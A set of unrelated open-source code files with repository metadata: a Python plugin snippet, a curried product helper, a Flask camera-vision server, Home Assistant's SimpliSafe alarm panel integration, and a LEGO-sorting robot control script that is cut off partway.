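
plugin = ExamplePlugin()
print(plugin.plugin_slug())   # 'exampleplugin', derived by slugifying PLUGIN_NAME
print(plugin.plugin_title())  # 'Example Plugin'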
from pyramda.function.curry import curry from pyramda.iterable.reduce import reduce from .multiply import multiply product = reduce(multiply, 1)
jackfirth/pyramda
pyramda/math/product.py
Python
mit
147
0
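Usage sketch of the curried product defined above; the import path follows the repository layout shown in the metadata.

from pyramda.math.product import product

print(product([1, 2, 3, 4]))  # 24
print(product([]))            # 1, assuming reduce falls back to the initial accumulator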
#!/usr/bin/env python import json, time from flask import Flask, request, render_template, Response from gevent import pywsgi, monkey from helpers.generateCalibration import GenerateCalibration #monkey.patch_all() app = Flask(__name__) #cameraInstance = Camera() runCalibration = GenerateCalibration('frames', 'calibration.json') class VisionServer: def __init__(self, queue): self.inQueue = queue @app.route('/') def index(): return render_template('index.html') @app.route('/hsl') def hslPage(): return render_template('hsl.html') @app.route('/calibrate') def calibratePage(): return render_template('calibrate.html') def genStream(camera): while True: yield (b'--frame\r\n' b'Content-Type: image/jpeg\r\n\r\n' + camera.get_frame() + b'\r\n') time.sleep(0.005) # yes, this delay is intentional. # maybe it's a hack, but hey, it works. @app.route('/stream') def stream(): return Response(genStream(cameraInstance), mimetype='multipart/x-mixed-replace; boundary=frame') @app.route('/post', methods=['POST']) def post(): if (request.form['action'] == 'changeHSL'): cameraInstance.changeHSL({'component': request.form['component'], 'min': request.form['min'], 'max': request.form['max']}) elif (request.form['action'] == 'getHSL'): return json.dumps(cameraInstance.getHSL()) elif (request.form['action'] == 'saveHSL'): return str(cameraInstance.saveHSL()) elif (request.form['action'] == 'setExposure'): return str(cameraInstance.setExposure(int(request.form['exposure']))) elif (request.form['action'] == 'on' or request.form['action'] == 'off'): if (request.form['action'] == 'on'): visionController.start() else: visionController.stop() return str(True); return str(True) @app.route('/capture') def capture(): # makes directory if it doesn't exist if not os.path.exists('frames'): os.makedirs('frames') # finds the highest int in filenames maxN = 0 if (os.listdir('frames')): files = os.listdir('frames') for file in files: this = file.split('.')[0] if (this != ''): if (int(this) > maxN): maxN = int(this) return str(cameraInstance.saveFrame('frames/' + str(maxN + 1) + '.jpg')) @app.route('/calibrate') def calibrate(): return str(runCalibration.run()) if __name__ == '__main__': gevent_server = pywsgi.WSGIServer(('', 80), app) gevent_server.serve_forever()
3299/visioninabox
server.py
Python
mit
2,744
0.027697
"""Support for SimpliSafe alarm control panels.""" import logging import re from simplipy.entity import EntityTypes from simplipy.system import SystemStates from homeassistant.components.alarm_control_panel import ( FORMAT_NUMBER, FORMAT_TEXT, AlarmControlPanel, ) from homeassistant.components.alarm_control_panel.const import ( SUPPORT_ALARM_ARM_AWAY, SUPPORT_ALARM_ARM_HOME, ) from homeassistant.const import ( CONF_CODE, STATE_ALARM_ARMED_AWAY, STATE_ALARM_ARMED_HOME, STATE_ALARM_DISARMED, ) from homeassistant.util.dt import utc_from_timestamp from . import SimpliSafeEntity from .const import DATA_CLIENT, DOMAIN _LOGGER = logging.getLogger(__name__) ATTR_ALARM_ACTIVE = "alarm_active" ATTR_BATTERY_BACKUP_POWER_LEVEL = "battery_backup_power_level" ATTR_GSM_STRENGTH = "gsm_strength" ATTR_LAST_EVENT_INFO = "last_event_info" ATTR_LAST_EVENT_SENSOR_NAME = "last_event_sensor_name" ATTR_LAST_EVENT_SENSOR_TYPE = "last_event_sensor_type" ATTR_LAST_EVENT_TIMESTAMP = "last_event_timestamp" ATTR_LAST_EVENT_TYPE = "last_event_type" ATTR_RF_JAMMING = "rf_jamming" ATTR_WALL_POWER_LEVEL = "wall_power_level" ATTR_WIFI_STRENGTH = "wifi_strength" async def async_setup_platform(hass, config, async_add_entities, discovery_info=None): """Set up a SimpliSafe alarm control panel based on existing config.""" pass async def async_setup_entry(hass, entry, async_add_entities): """Set up a SimpliSafe alarm control panel based on a config entry.""" simplisafe = hass.data[DOMAIN][DATA_CLIENT][entry.entry_id] async_add_entities( [ SimpliSafeAlarm(simplisafe, system, entry.data.get(CONF_CODE)) for system in simplisafe.systems.values() ], True, ) class SimpliSafeAlarm(SimpliSafeEntity, AlarmControlPanel): """Representation of a SimpliSafe alarm.""" def __init__(self, simplisafe, system, code): """Initialize the SimpliSafe alarm.""" super().__init__(system, "Alarm Control Panel") self._changed_by = None self._code = code self._simplisafe = simplisafe self._state = None # Some properties only exist for V2 or V3 systems: for prop in ( ATTR_BATTERY_BACKUP_POWER_LEVEL, ATTR_GSM_STRENGTH, ATTR_RF_JAMMING, ATTR_WALL_POWER_LEVEL, ATTR_WIFI_STRENGTH, ): if hasattr(system, prop): self._attrs[prop] = getattr(system, prop) @property def changed_by(self): """Return info about who changed the alarm last.""" return self._changed_by @property def code_format(self): """Return one or more digits/characters.""" if not self._code: return None if isinstance(self._code, str) and re.search("^\\d+$", self._code): return FORMAT_NUMBER return FORMAT_TEXT @property def state(self): """Return the state of the entity.""" return self._state @property def supported_features(self) -> int: """Return the list of supported features.""" return SUPPORT_ALARM_ARM_HOME | SUPPORT_ALARM_ARM_AWAY def _validate_code(self, code, state): """Validate given code.""" check = self._code is None or code == self._code if not check: _LOGGER.warning("Wrong code entered for %s", state) return check async def async_alarm_disarm(self, code=None): """Send disarm command.""" if not self._validate_code(code, "disarming"): return await self._system.set_off() async def async_alarm_arm_home(self, code=None): """Send arm home command.""" if not self._validate_code(code, "arming home"): return await self._system.set_home() async def async_alarm_arm_away(self, code=None): """Send arm away command.""" if not self._validate_code(code, "arming away"): return await self._system.set_away() async def async_update(self): """Update alarm status.""" event_data = 
self._simplisafe.last_event_data[self._system.system_id] if event_data.get("pinName"): self._changed_by = event_data["pinName"] if self._system.state == SystemStates.error: self._online = False return self._online = True if self._system.state == SystemStates.off: self._state = STATE_ALARM_DISARMED elif self._system.state in (SystemStates.home, SystemStates.home_count): self._state = STATE_ALARM_ARMED_HOME elif self._system.state in ( SystemStates.away, SystemStates.away_count, SystemStates.exit_delay, ): self._state = STATE_ALARM_ARMED_AWAY else: self._state = None last_event = self._simplisafe.last_event_data[self._system.system_id] self._attrs.update( { ATTR_ALARM_ACTIVE: self._system.alarm_going_off, ATTR_LAST_EVENT_INFO: last_event["info"], ATTR_LAST_EVENT_SENSOR_NAME: last_event["sensorName"], ATTR_LAST_EVENT_SENSOR_TYPE: EntityTypes(last_event["sensorType"]).name, ATTR_LAST_EVENT_TIMESTAMP: utc_from_timestamp( last_event["eventTimestamp"] ), ATTR_LAST_EVENT_TYPE: last_event["eventType"], } )
qedi-r/home-assistant
homeassistant/components/simplisafe/alarm_control_panel.py
Python
apache-2.0
5,527
0.000543
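The code_format property above chooses between a numeric keypad and a free-text field; a standalone sketch of just that decision, with the Home Assistant format constants inlined as plain strings:

import re

def code_format(code):
    """Return 'number' for all-digit codes, 'text' otherwise, None if no code is set."""
    if not code:
        return None
    if isinstance(code, str) and re.search(r'^\d+$', code):
        return 'number'
    return 'text'

print(code_format('1234'))    # number
print(code_format('s3cret'))  # text
print(code_format(None))      # None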
#Euclidean path planning control with Kalman filter for localization import time import cv2 from ev3control.rpc import Robot from rick.controllers import * from rick.A_star_planning import * from rick.core import State from rick.core import main_loop from rick.async import AsyncCamera from rick.utils import TrackerWrapper, bbox_center from nn_object_detection.object_detectors import NNObjectDetector from rick.live_plotting import MapRenderer from detection.marker_localization import get_marker_pose, load_camera_params import cv2.aruco as aruco from dlrc_one_shot_learning.similarity_detectors import EuclidianNNFeaturesBrickFinder, VAESimilarityDetector from rick.mc_please_github_donot_fuck_with_this_ones import A_star_path_planning_control,compute_A_star_path, A_star_control import numpy as np from math import pi from sklearn.mixture import GaussianMixture from detection.opencv import get_lego_boxes, eliminate_grip # from clustering import BBoxKMeansClustering from rick.motion_control import euclidian_kalman , kalman_filter , kalman_filter2 , robot_control, odom_estimation import sys sys.path.append("../slam/") import mapping import matplotlib.pyplot as plt from detection.opencv import detect_purple PATH_TO_CKPT = "/home/julen/dlrc_models/frozen_inference_graph.pb" PATH_TO_LABELS = "/home/dlrc/projects/DLRCev3/object_detection/nn_object_detection/tf_train_dir/data/label_map.pbtxt" print("Creating robot...") data = np.load('Homographygood.npz') H=data["arr_0"] map_renderer = MapRenderer() object_detector = NNObjectDetector(PATH_TO_CKPT, PATH_TO_LABELS) similarity_detector = VAESimilarityDetector() clustering_alg = GaussianMixture(n_components=4) NUM_CLUSTERS = 2 def acquire_target(robot, frame, **kwargs): """Callback for acquiring a lego target.""" BB_legos = get_lego_boxes(frame) # We wait until there's only one lego in view if len(BB_legos) == 1: print("found a brick") bboxes = [frame[bbox[0]:bbox[2], bbox[1]:bbox[3]] for bbox in BB_legos] robot.target = bounding_box_features = similarity_detector.extract_features(bboxes)[0] return "SEARCH_TARGET", frame, {} else: print(len(BB_legos)) return "ACQUIRE_TARGET", frame, {} def plot_mapa(mapa,robot_traj): mapa1 = np.array(mapa) rob = np.array(robot_traj) print("Before stop") if mapa1.size: print("In") plt.scatter(mapa1[:,0],mapa1[:,1]) print("Out") if rob.size > 100: plt.plot(rob[:,0],rob[:,1]) plt.axis([-100, 150, -100, 150]) plt.legend(["Lego", "path"]) plt.show() print("After stop") def search_control(state_search,mapa, pos_rob, t_old): t1 = 0 if state_search ==1: target = [0.1,0.1]# THE POINT REPRESENTS THE MIDDLE OF THE WORKSPACE vel_wheels = robot_control(pos_rob,target, K_x=1,K_y=1,K_an=1) distance = np.sqrt(np.power(pos_rob[0]-target[0],2) + np.power(pos_rob[1]-target[1],2)) if distance < 10: state_search = 2 t1 = time.time() elif state_search ==2: vel_wheels = [100,100] return vel_wheels,state_search,t1 def naive_obstacle_avoidance_control(mapa, pos_rob): max_dist = 30 min_angle = -pi/5 max_angle = pi/5 mapa_ar = np.array(mapa) vel_wheels = [160,150] for i in range(0, len(mapa)): er_x = mapa[i][0] - pos_rob[0] er_y = mapa[i][1] - pos_rob[1] distance = np.sqrt(np.power(er_x,2) + np.power(er_y,2)) er_angle = np.arctan2(er_y, er_x) - pos_rob[2]*pi/180 if er_angle >pi: er_angle = er_angle -2*pi if er_angle < -pi: er_angle = er_angle +2*pi next_x = pos_rob[0] + 10*np.cos(pos_rob[2] * pi/180) next_y = pos_rob[1] + 10*np.sin(pos_rob[2] * pi/180) if (distance< max_dist and er_angle > min_angle and er_angle< max_angle): # AVOID OBSTACLES 
vel_wheels = [-100,100] break elif next_x < 0 or next_x > 300 or next_y < 0 or next_y> 300: vel_wheels = [-100,100] return vel_wheels def get_lego_boxes(frame, threshold=0.9, return_closest=False): #res = object_detector.detect_with_threshold(frame,threshold=threshold, return_closest=return_closest) #BB_legos = map(lambda x: x[0], res) #return list(BB_legos) BB_legos=gl(frame) return BB_legos def index23(BB_legos,BB_target): index=1000 i=0 for box in BB_legos: if box[0]==BB_target[0][0] and box[1] == BB_target[0][1]: index = i i+=1 return index def search_target_with_Kalman_and_mapping(robot, frame , ltrack_pos=0, rtrack_pos=0, P=np.identity(3), marker_list = [], delete_countdown = 0 , mapa = [], robot_trajectory = [],R=[],state_search = 2 , t1=0, t = None,feature_map = [],iteration=0,iteration2=0): if not t: t = time.time() ################ THIS IS ALLL new_ltrack_pos = robot.left_track.position new_rtrack_pos = robot.right_track.position odom_l, odom_r = new_ltrack_pos - ltrack_pos, new_rtrack_pos - rtrack_pos marker_map = np.array([[150,0,0],[91,110,pi/2],[0,41,pi],[0,0,0]]) frame = eliminate_grip(frame) BB_legos2=get_lego_boxes(frame) BB_legos=[] for bbox in BB_legos2: if bbox[3]<460 and (bbox[2]<380 or bbox[2]>420): BB_legos.append(bbox) image_name="lego_boxes" for bbox in BB_legos: image_complete_name="{}_{}{}".format(image_name,iteration,".png") iteration+=1 input_frame=frame[bbox[1]:bbox[3],bbox[0]:bbox[2],:] cv2.imwrite(image_complete_name,input_frame) #frame = plot_bbox(frame, bbox) lego_landmarks = mapping.cam2rob(BB_legos,H) mtx,dist=load_camera_params() frame,marker_list=get_marker_pose(frame,mtx,dist,marker_list=[0,1,2,3],markerLength=8.6) print("####################################################################################") estim_rob_pos_odom = odom_estimation(odom_r,odom_l,robot.position) index = 1000 mapa, delete_countdown,robot_trajectory, links = mapping.update_mapa2(mapa,lego_landmarks,estim_rob_pos_odom,P,delete_countdown, robot_trajectory, index) Ts = 0.3 estim_rob_pos, P = kalman_filter2(odom_r,odom_l,robot.position,marker_list, marker_map,Ts,P) robot.position = estim_rob_pos mapa = mapping.after_kalman_improvement(mapa, robot.position, estim_rob_pos_odom) d = np.ones(3) d[0] = estim_rob_pos[0] + 28 *np.cos(estim_rob_pos[2] * pi/180) d[1] = estim_rob_pos[1] + 28* np.sin(estim_rob_pos[2]*pi/180) d[2] = estim_rob_pos[2] R.append(d) box_print = [x + [0] for x in marker_map.tolist()] map_renderer.plot_bricks_and_trajectory_and_robot_and_boxes(mapa, R, d, box_print) ############################################ print("odom :", estim_rob_pos_odom, "kalmancito" , estim_rob_pos ) #Feature extraction from bounding boxes image_name2="lego_boxes_no_duplicates" bboxes = [] for i in range(0,len(links)): bbox = BB_legos[links[i][0]] bboxes.append(frame[bbox[1]:bbox[3], bbox[0]:bbox[2],:]) image_complete_name2="{}_{}{}".format(image_name2,iteration2,".png") iteration2+=1 input_frame2=frame[bbox[1]:bbox[3],bbox[0]:bbox[2],:] cv2.imwrite(image_complete_name2,input_frame2) bounding_box_features = similarity_detector.extract_features(bboxes) for i in range(0,len(links)): feature_map[links[i][1]] = bounding_box_features[i] print("SHAPE: ", len(feature_map)) #print("FEAT" , feature_map) #DEFINE MOTION CONTROL FOR SEARCHING # THE CONTROL IS : 1. GO TO THE CENTER OF THE WORKSPACE, 2. 
ROUND FOR 2 secs , SELECT A POINT CLOSE TO THE CENTER as new target vel_wheels = naive_obstacle_avoidance_control(mapa, robot.position) iteration+=1 if time.time()-t > 30: clust_feats=[] for item in feature_map: if not np.all(item==0): clust_feats.append(item) clustering_alg.fit(clust_feats, n_clusters=NUM_CLUSTERS) map_renderer.plot_bricks_and_trajectory_and_robot(mapa, R, d) return "SELECT_AND_GO", frame, {"ltrack_pos" : new_ltrack_pos ,"rtrack_pos" : new_rtrack_pos,"R" : R, "mapa" : mapa} else: robot.move(vel_left=vel_wheels[1], vel_right=vel_wheels[0]) return "SEARCH_TARGET", frame, {"ltrack_pos": new_ltrack_pos, "rtrack_pos": new_rtrack_pos, "P": P , "marker_list": [], "delete_countdown" : delete_countdown , "mapa": mapa, "robot_trajectory": robot_trajectory, "R" : R, "state_search" : 2, "t1" : t1, "t" : t, "feature_map":feature_map ,"iteration":iteration,"iteration":iteration2} def select_and_go(robot,frame, cluster = 0,ltrack_pos=0, rtrack_pos=0,P = np.identity(3),R=[], mapa = [],tracker=None ,img_res=np.asarray((640, 480)), atol=10, vel_forward = 299, vel_rot = 100, atol_move_blind=140, fail_counter=0, center_position_error = 55, robot_trajectory = [], prev_BB_target = []): ################ THIS IS ALLL new_ltrack_pos = robot.left_track.position new_rtrack_pos = robot.right_track.position odom_l, odom_r = new_ltrack_pos - ltrack_pos, new_rtrack_pos - rtrack_pos marker_map = np.array([[150,0,0],[91,110,pi/2],[0,41,pi],[0,0,0]]) frame = eliminate_grip(frame) BB_legos2=get_lego_boxes(frame, return_closest=True) BB_legos=[] for bbox in BB_legos2: if bbox[3]<460: BB_legos.append(bbox) lego_landmarks = mapping.cam2rob(BB_legos,H) mtx,dist=load_camera_params() frame,marker_list=get_marker_pose(frame,mtx,dist,marker_list=[0,1,2,3],markerLength=8.6) print("####################################################################################") estim_rob_pos_odom = odom_estimation(odom_r,odom_l,robot.position) index = 1000 mapa, delete_countdown,robot_trajectory, links = mapping.update_mapa2(mapa,lego_landmarks,estim_rob_pos_odom,P,0, robot_trajectory, index) Ts = 0.3 estim_rob_pos, P = kalman_filter2(odom_r,odom_l,robot.position,marker_list, marker_map,Ts,P) robot.position = estim_rob_pos mapa = mapping.after_kalman_improvement(mapa, robot.position, estim_rob_pos_odom) d = np.ones(3) d[0] = estim_rob_pos[0] + 28 *np.cos(estim_rob_pos[2] * pi/180) d[1] = estim_rob_pos[1] + 28* np.sin(estim_rob_pos[2]*pi/180) d[2] = estim_rob_pos[2] R.append(d) box_print = [x + [0] for x in marker_map.tolist()] map_renderer.plot_bricks_and_trajectory_and_robot_and_boxes(mapa, R, d, box_print) ############################################ print("robot pos in blind grip: ", robot.position) if not tracker: tracker = TrackerWrapper(cv2.TrackerKCF_create) ################################## control################################ #print("BB target ", BB_target) ok, BB_target = tracker.update(frame) print("BB LEGOS", len(BB_legos)) if not ok: if len(BB_legos) >0: if len(prev_BB_target)>0: center_old = bbox_center(*prev_BB_target) sh_dist = 999999999999 for box in BB_legos: center_new = bbox_center(*box) distance = np.sqrt(np.power(center_new[0]-center_old[0],2)+ np.power(center_new[1]- center_old[1],2)) if distance < sh_dist: sh_dist = distance BB_target = box else: BB_target = BB_legos[0] tracker.init(frame, BB_target) else: robot.rotate_left(vel=100) return "SELECT_AND_GO", frame, {"cluster" : cluster, "ltrack_pos" : new_ltrack_pos ,"rtrack_pos" : new_rtrack_pos, "R" : R, "mapa" : mapa} ############ CLUSTERING 
RELATED ####################### bboxes = [] print("EL TARGET",BB_target) bbox = BB_target bboxes.append(frame[bbox[1]:bbox[3], bbox[0]:bbox[2],:]) bounding_box_features = similarity_detector.extract_features(bboxes) #cluster = clustering_alg.predict(bounding_box_features) cluster = [1] ######################################################### coords = bbox_center(*bbox) img_center = img_res / 2 - center_position_error #img_center[0] = 285 error = img_center - coords atol = 10 + coords[1]/480 * 40 print("Errror:", error, "Coords ", coords, " ok ", ok) frame = plot_bbox(frame,bbox, 0, (255,0,0)) if np.isclose(coords[0], img_center[0], atol=atol) and np.isclose(coords[1], img_res[1], atol=atol_move_blind): robot.move_straight(vel_forward, 500) return "MOVE_TO_BRICK_BLIND_AND_GRIP", frame, {"cluster" : cluster, "ltrack_pos" : new_ltrack_pos ,"rtrack_pos" : new_rtrack_pos, "R" : R, "mapa" : mapa} if np.isclose(coords[0], img_center[0], atol=atol): print("Move straight") robot.move_straight(vel_forward) return "SELECT_AND_GO", frame, {"prev_BB_target" : BB_target, "cluster" : cluster,"tracker" : tracker, "ltrack_pos" : new_ltrack_pos ,"rtrack_pos" : new_rtrack_pos,"R" : R, "mapa" : mapa} elif error[0] < 0: robot.rotate_left(vel=vel_rot) return "SELECT_AND_GO", frame, {"prev_BB_target" : BB_target, "cluster" : cluster,"tracker" : tracker, "ltrack_pos" : new_ltrack_pos ,"rtrack_pos" : new_rtrack_pos, "R" : R, "mapa" : mapa} else: # Positive velocity for turning left robot.rotate_right(vel=vel_rot) return "SELECT_AND_GO", frame, {"prev_BB_target" : BB_target, "cluster" : cluster,"tracker" : tracker, "ltrack_pos" : new_ltrack_pos ,"rtrack_pos" : new_rtrack_pos, "R" : R, "mapa" : mapa} #MOVE TO BRICK BLIND def move_to_brick_blind_and_grip(robot, frame, R=[],ltrack_pos=0 , rtrack_pos=0,marker_list=[],mapa=[], vel=400, t=1700, cluster=None): # Make sure the grip is open robot.grip.open() robot.elevator.down() robot.elevator.wait_until_not_moving() robot.move_straight(vel=vel, time=t) robot.wait_until_not_moving() robot.pick_up() #odometry update marker_map = np.array([[150,0,0],[91,110,pi/2],[0,41,pi],[0,0,0]]) P = np.identity(3) new_ltrack_pos = robot.left_track.position new_rtrack_pos = robot.right_track.position odom_l, odom_r = new_ltrack_pos - ltrack_pos, new_rtrack_pos - rtrack_pos Ts = 0.3 estim_rob_pos, P = kalman_filter2(odom_r,odom_l,robot.position,marker_list, marker_map,Ts,P) robot.position = estim_rob_pos print("robot pos in blind grip: ", robot.position) obj_list = [] Map = create_map(obj_list) return "GO_TO_BOX", frame, {"ltrack_pos": new_ltrack_pos, "rtrack_pos": new_rtrack_pos , "mapa": mapa, "R" : R, "cluster" : cluster, "Map" : Map} def A_star_move_to_box_blind(robot, frame, Map=[],cluster = 0, replan=1, path=[], iteration=0, ltrack_pos=0, rtrack_pos=0, TIME=0, P = np.identity(3),R=[], mapa = []): ################ THIS IS ALLL new_ltrack_pos = robot.left_track.position new_rtrack_pos = robot.right_track.position odom_l, odom_r = new_ltrack_pos - ltrack_pos, new_rtrack_pos - rtrack_pos marker_map = np.array([[150,0,0],[91,110,pi/2],[0,41,pi],[0,0,0]]) # WHERE VTHE OPTICAL MARKERS ARE IN THE ENVIROMENT frame = eliminate_grip(frame) BB_legos=get_lego_boxes(frame) lego_landmarks = mapping.cam2rob(BB_legos,H) mtx,dist=load_camera_params() frame,marker_list=get_marker_pose(frame,mtx,dist,marker_list=[0,1,2,3],markerLength=8.6) print("####################################################################################") estim_rob_pos_odom = odom_estimation(odom_r,odom_l,robot.position) 
index = 1000 mapa, delete_countdown,robot_trajectory, links = mapping.update_mapa2(mapa,lego_landmarks,estim_rob_pos_odom,P,0, [], index) Ts = 0.3 estim_rob_pos, P = kalman_filter2(odom_r,odom_l,robot.position,marker_list, marker_map,Ts,P) robot.position = estim_rob_pos mapa = mapping.after_kalman_improvement(mapa, robot.position, estim_rob_pos_odom) d = np.ones(3) d[0] = estim_rob_pos[0] + 28 *np.cos(estim_rob_pos[2] * pi/180) d[1] = estim_rob_pos[1] + 28* np.sin(estim_rob_pos[2]*pi/180) d[2] = estim_rob_pos[2] R.append(d) box_print = [x + [0] for x in marker_map.tolist()] box_print[cluster][3] = 1 map_renderer.plot_bricks_and_trajectory_and_robot_and_boxes(mapa, R, d, box_print) ############################################ print("robot_estim_pos_Astar: ", robot.position) marker_map_obj = [[110,0,0],[91,70,pi/2],[41,40,pi],[0,0,0]] marker_map_obj = np.int_(np.array(marker_map_obj)) obj = marker_map_obj[cluster[0],:2] print("THE BOX TO GO", obj, cluster) #print("DIFFERENTCE WITH THE GOAL:",abs(estim_rob_pos[0]-goal_pos[0]),abs(estim_rob_pos[1]-goal_pos[1])) #CONDITION FOR EXITTING distance_to_target = np.sqrt(np.power(estim_rob_pos[0]-marker_map_obj[cluster[0],0],2)+ np.power(estim_rob_pos[1]-marker_map_obj[cluster[0],1],2)) if distance_to_target < 20: return ("MOVE_TO_BOX_BY_VISION", frame, { "cluster": cluster,"ltrack_pos" : new_ltrack_pos ,"rtrack_pos" : new_rtrack_pos, "mapa":mapa}) #update map path=A_star(robot.position[0:2], obj, Map) replan=1 goal_pos=obj t0 = time.time() vel_wheels, new_path = A_star_control(robot.position,goal_pos, Map, robot.sampling_rate, odom_r= odom_r,odom_l=odom_l, iteration=iteration, path=path) robot.move(vel_left=vel_wheels[1], vel_right=vel_wheels[0]) iteration += 1 print("###########################################################################################################") print("distance to target: ", distance_to_target) print("estimated vs goal", estim_rob_pos[0:2],goal_pos) print("###########################################################################################################") return ("GO_TO_BOX", frame, {"cluster":cluster, "replan":replan,"Map":Map,"iteration" : iteration, "path" : new_path, "ltrack_pos": new_ltrack_pos, "rtrack_pos": new_rtrack_pos, "TIME": t0,"R":R, "mapa" : mapa}) def PID_control(robot, marker_map, box_coords,hist): vel_st=100 vel_rot=60 lat_tol=4 yshift=2 er_x = marker_map[0,0] - robot[0] er_y = marker_map[0,1] - robot[1] er_angle = np.arctan2(er_y, er_x) - robot[2]*pi/180 print("ANGLES WITH MARKER AND ERROR",np.arctan2(er_y, er_x)*180/pi,robot[2]) if er_angle > pi: er_angle = er_angle - 2*pi if er_angle < -pi: er_angle = er_angle + 2*pi distance = np.sqrt(np.power(er_x,2)+np.power(er_y,2)) if box_coords: print("Y_DISTANCE_TO_MARKER",box_coords[1]) if abs(box_coords[1]+yshift)>lat_tol: vel_wheels=np.asarray([-vel_rot,vel_rot])*np.sign(-box_coords[1]) print("GUIDDE BY VISION") elif box_coords[0]>35: vel_wheels=np.asarray([vel_st,vel_st]) print("GUIDDE BY VISION") else: vel_wheels=np.asarray([0,0]) hist = 0 print("STOP") else: if hist == 0: vel_wheels=np.asarray([0,0]) elif er_angle > 0.7: vel_wheels=np.asarray([vel_rot,-vel_rot]) hist = 1 elif er_angle <-0.7: vel_wheels=np.asarray([-vel_rot,vel_rot]) hist = -1 elif hist ==1 : vel_wheels=np.asarray([vel_rot,-vel_rot]) else : vel_wheels=np.asarray([-vel_rot,vel_rot]) print("CORRECTING ANGLE",er_angle) return vel_wheels, hist def move_to_box_by_vision(robot, frame, cluster =0, replan=1, path=[], iteration=0, ltrack_pos=0, rtrack_pos=0, TIME=0, P = np.identity(3), 
histeresis = 1,mapa=[],robot_trajectory=[]): ################ THIS IS ALLL new_ltrack_pos = robot.left_track.position new_rtrack_pos = robot.right_track.position odom_l, odom_r = new_ltrack_pos - ltrack_pos, new_rtrack_pos - rtrack_pos marker_map = marker_map = np.array([[150,0,0],[91,110,pi/2],[0,41,pi],[0,0,0]]) frame = eliminate_grip(frame) BB_legos=get_lego_boxes(frame) lego_landmarks = mapping.cam2rob(BB_legos,H) mtx,dist=load_camera_params() frame,marker_list=get_marker_pose(frame,mtx,dist,marker_list=[0,1,2,3],markerLength=8.6) print("####################################################################################") estim_rob_pos_odom = odom_estimation(odom_r,odom_l,robot.position) index = 1000 mapa, delete_countdown,robot_trajectory, links = mapping.update_mapa2(mapa,lego_landmarks,estim_rob_pos_odom,P,0, robot_trajectory, index) Ts = 0.3 estim_rob_pos, P = kalman_filter2(odom_r,odom_l,robot.position,marker_list, marker_map,Ts,P) robot.position = estim_rob_pos mapa = mapping.after_kalman_improvement(mapa, robot.position, estim_rob_pos_odom) d = np.ones(3) d[0] = estim_rob_pos[0] + 28 *np.cos(estim_rob_pos[2] * pi/180) d[1] = estim_rob_pos[1] + 28* np.sin(estim_rob_pos[2]*pi/180) d[2] = estim_rob_pos[2] R.append(d) box_print = [x + [0] for x in marker_map.tolist()] box_print[cluster][3] = 1 map_renderer.plot_bricks_and_trajectory_and_robot_and_boxes(mapa, R, d, box_print) #map_renderer.plot_bricks_and_trajectory(mapa, R) ############################################ print("######################################") print("robot_estim_pos_vision: ", robot.position) print("######################################") marker_map_obj = [[110,0,0],[91,70,pi/2],[40,41,pi],[0,0,0]] obj = marker_map_obj[cluster[0]] print("robot_estim_pos_PID: ", robot.position) box_coords = [marker_list[cluster[0],1]*np.cos(marker_list[cluster[0],0]),marker_list[cluster[0],1]*np.sin(marker_list[cluster[0],0])] vel_wheels, hist = PID_control(estim_rob_pos, marker_map,box_coords, histeresis) if hist==0: return "PLACE_OBJECT_IN_THE_BOX",frame,{"ltrack_pos": new_ltrack_pos, "rtrack_pos" : new_rtrack_pos, "mapa" : mapa} robot.move(vel_wheels[0],vel_wheels[1]) return ("MOVE_TO_BOX_BY_VISION", frame, {"ltrack_pos": new_ltrack_pos, "rtrack_pos" : new_rtrack_pos, "histeresis" : hist, "cluster": cluster}) def place_object_in_the_box(robot,frame, ltrack_pos=0, rtrack_pos=0, P = np.identity(3), mapa = []): ################ THIS IS ALLL new_ltrack_pos = robot.left_track.position new_rtrack_pos = robot.right_track.position odom_l, odom_r = new_ltrack_pos - ltrack_pos, new_rtrack_pos - rtrack_pos marker_map = np.array([[150,0,0],[91,110,pi/2],[0,41,pi],[0,0,0]]) # WHERE VTHE OPTICAL MARKERS ARE IN THE ENVIROMENT BB_legos=get_lego_boxes(frame) lego_landmarks = mapping.cam2rob(BB_legos,H) mtx,dist=load_camera_params() frame,marker_list=get_marker_pose(frame,mtx,dist,marker_list=[0,1,2,3],markerLength=8.6) print("####################################################################################") estim_rob_pos_odom = odom_estimation(odom_r,odom_l,robot.position) index = 1000 mapa, delete_countdown,robot_trajectory, links = mapping.update_mapa2(mapa,lego_landmarks,estim_rob_pos_odom,P,0, [], index) Ts = 0.3 estim_rob_pos, P = kalman_filter2(odom_r,odom_l,robot.position,marker_list, marker_map,Ts,P) robot.position = estim_rob_pos mapa = mapping.after_kalman_improvement(mapa, robot.position, estim_rob_pos_odom) d = np.ones(3) d[0] = estim_rob_pos[0] + 28 *np.cos(estim_rob_pos[2] * pi/180) d[1] = estim_rob_pos[1] + 28* 
np.sin(estim_rob_pos[2]*pi/180) d[2] = estim_rob_pos[2] #R.append(d) #map_renderer.plot_bricks_and_trajectory(mapa, R) ############################################ robot.move(vel_left=100,vel_right=100,time=2000) print("MOVING") robot.left_track.wait_until_not_moving(timeout=3000) robot.reset() robot.grip.wait_until_not_moving(timeout=3000) robot.move_straight(vel=-100,time=2000) robot.left_track.wait_until_not_moving(timeout=3000) robot.rotate_left(100,time=6000) robot.left_track.wait_until_not_moving(timeout=10000) print("finish") return "SELECT_AND_GO", frame, {"ltrack_pos" : new_ltrack_pos ,"rtrack_pos" : new_rtrack_pos,"R" : [], "mapa" : mapa} def camera_related(frame): arucoParams = aruco.DetectorParameters_create() mtx,dist = load_camera_params() image,marker_pos = get_marker_pose(frame, mtx, dist,arucoParams=arucoParams, marker_list=[0,1,2,3,4,5], markerLength = 3.3) #print("Output marco function:",marker_pos) return image,marker_pos with Robot(AsyncCamera(0)) as robot: robot.map = [(200, 0)] robot.sampling_rate = 0.1 print("These are the robot motor positions before planning:", robot.left_track.position, robot.right_track.position) # Define the state graph, we can do this better, currently each method # returns the next state name states = [ State( name="SEARCH_TARGET", act=search_target_with_Kalman_and_mapping, default_args={ "ltrack_pos": robot.left_track.position, "rtrack_pos": robot.right_track.position, "P" : np.identity(3), "delete_countdown" : 0, "mapa": [], "robot_trajectory": [], "feature_map" : [0] * 300 } ), State( name="SELECT_AND_GO", act=select_and_go, default_args={ "ltrack_pos": robot.left_track.position, "rtrack_pos": robot.right_track.position, "P" : np.identity(3), "mapa": [] } ), State( name="MOVE_TO_BRICK_BLIND_AND_GRIP", act=move_to_brick_blind_and_grip, default_args={"vel": 250, "t" : 1200, "ltrack_pos": robot.left_track.position, "rtrack_pos": robot.right_track.position, } ), State( name="GO_TO_BOX", act= A_star_move_to_box_blind, default_args={} ), State( 